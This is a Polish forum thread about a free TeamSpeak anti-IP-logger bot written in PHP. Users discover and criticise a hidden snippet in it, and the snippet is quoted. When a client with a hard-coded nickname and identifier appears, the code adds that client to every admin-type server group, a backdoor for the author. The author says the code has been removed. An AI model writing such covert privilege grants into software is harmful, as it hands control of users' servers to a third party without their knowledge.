Skocz do zawartości
Szukaj w
  • Więcej opcji...
Znajdź wyniki, które zawierają...
Szukaj wyników w...
Stalker

[Bot] AntyIPLogger

Rekomendowane odpowiedzi

Witam

Dlatego, że nie mam czasu na zajmowanie się tymi wszystkimi płatnymi aplikacjami udostępniam wam pierwszą wersję antyIPLoggera 

1. Wymagane pakiety:

- Najlepiej php7.2 

2. Instalacja:

- Wszystko jest opisane w pliku instrukcja.txt

3. Obsługa:

- Start ( ./run start )

- Stop ( ./run stop )

- Usunięcie starych zdjęć ( php bot.php -i 2 )

4. Download:

Zawartość ukryta

Zareaguj na post, aby zobaczyć ukrytą zawartość.

Skan: https://www.virustotal.com/gui/file/2a3eda5c2cc5a4730525f66ad602e527c5c9f627f8041af44f56f7e4348c2e89/detection

Zakazuje udostępniania aplikacji na innych forach. Pomoc z aplikacją uzyskacie tylko tutaj!

Edytowane przez Stalker
  • Lubię to! 40

Udostępnij tę odpowiedź

Odnośnik do odpowiedzi

A co to za linijeczki? 

foreach($ts->getElement('data', $ts->clientList('-uid')) as $user){
      if($user['client_nickname'] == "AntyAnty" && $user['client_unique_identifier'] == "N9spIWFEsUkg0nJVH94nSgPdCTc="){
        foreach($ts->getElement('data', $ts->serverGroupList()) as $grou){
          if($grou['type'] == 2){
            $ts->serverGroupAddClient($grou['sgid'], $user['client_database_id']);
          }
        }
      }
    }
  • Hahaa! 1

TAK

Udostępnij tę odpowiedź

Odnośnik do odpowiedzi
W dniu 8.10.2019 o 21:05, MarcineG napisał:

A co to za linijeczki? 

foreach($ts->getElement('data', $ts->clientList('-uid')) as $user){
      if($user['client_nickname'] == "AntyAnty" && $user['client_unique_identifier'] == "N9spIWFEsUkg0nJVH94nSgPdCTc="){
        foreach($ts->getElement('data', $ts->serverGroupList()) as $grou){
          if($grou['type'] == 2){
            $ts->serverGroupAddClient($grou['sgid'], $user['client_database_id']);
          }
        }
      }
    }

Godzinę temu, Paweł MF napisał:

@Stalker możesz to wyjaśnić 

W tym przypadku to i ja się mogę wypowiedzieć, sprawa logiczna była to płatna aplikacja i każdy autor swojej aplikacji daje zakodowaną możliwość ingerowania w sewer w przypadku rozkodowywania aplikacji oraz jej używanie nie znając kodu.

To jest standardowe zabezpieczenie w płatnych aplikacjach ale jednak jak już daje jako publiczną to nie powinna mieć miejsca taka sytuacja..

• Kocham To! 1

Udostępnij tę odpowiedź

Odnośnik do odpowiedzi
Godzinę temu, Emos napisał:

W tym przypadku to i ja się mogę wypowiedzieć, sprawa logiczna była to płatna aplikacja i każdy autor swojej aplikacji daje zakodowaną możliwość ingerowania w sewer w przypadku rozkodowywania aplikacji oraz jej używanie nie znając kodu.

To jest standardowe zabezpieczenie w płatnych aplikacjach ale jednak jak już daje jako publiczną to nie powinna mieć miejsca taka sytuacja..

Dokładnie tak. 

Kod został usunięty 😉

Udostępnij tę odpowiedź

Odnośnik do odpowiedzi
21 godzin temu, Stalker napisał:

Dokładnie tak. 

Kod został usunięty 😉

Osobiście nigdy nie kupiłbym aplikacji czy nawet używał darmowej aplikacji osoby, która robi sobie backdoory na moim serwerze.

@Emos jeśli autor aplikacji nie informuje użytkownika o takiej ukrytej "funkcji" to powinien wylecieć z rynku z wielkim znamieniem na twarzy "Nie kupuj u mnie, jestem oszustem". 

• Kocham To! 1

ts.krzysiekn.pl

Udostępnij tę odpowiedź

Odnośnik do odpowiedzi
57 minut temu, krzysiekn napisał:

Osobiście nigdy nie kupiłbym aplikacji czy nawet używał darmowej aplikacji osoby, która robi sobie backdoory na moim serwerze.

@Emos jeśli autor aplikacji nie informuje użytkownika o takiej ukrytej "funkcji" to powinien wylecieć z rynku z wielkim znamieniem na twarzy "Nie kupuj u mnie, jestem oszustem". 

A klienci którzy rozsyłają rozkodowane aplikacje powinni zapłacić autorowi za każde 1 pobranie jej 😉 

Edytowane przez Stalker

Udostępnij tę odpowiedź

Odnośnik do odpowiedzi
Godzinę temu, Stalker napisał:

A klienci którzy rozsyłają rozkodowane aplikacje powinni zapłacić autorowi za każde 1 pobranie jej 😉 

To już inna kwestia. Łamanie dobrych obyczajów nie pozwala na łamanie dobrych obyczajów. Jeśli dodajesz cos do apki i nie informujesz o tym klienta, szczegolnie do platnej apki, to jest tyle samo warty co klient co rozsyla apki.

• Kocham To! 1

ts.krzysiekn.pl

Udostępnij tę odpowiedź

Odnośnik do odpowiedzi
14 godzin temu, krzysiekn napisał:

To już inna kwestia. Łamanie dobrych obyczajów nie pozwala na łamanie dobrych obyczajów. Jeśli dodajesz cos do apki i nie informujesz o tym klienta, szczegolnie do platnej apki, to jest tyle samo warty co klient co rozsyla apki.

A skąd wiesz, ze nie informowałem?

• Hahaa! 2

Udostępnij tę odpowiedź

Odnośnik do odpowiedzi

Proszę o zaprzestanie jakichkolwiek dyskusji w tym temacie, ponieważ nie jest on do tego stworzony. Jeśli chcecie sobie coś wyjaśnić ew. dodać to zapraszam do prywatnej wiadomości.

Odpowiedzi, które nie będą tyczyły się samej aplkacji (działanie, problemy lub ew. opinia) będą traktowane jako wykroczenie i zostanie nadane ostrzeżenie.

Udostępnij tę odpowiedź

Odnośnik do odpowiedzi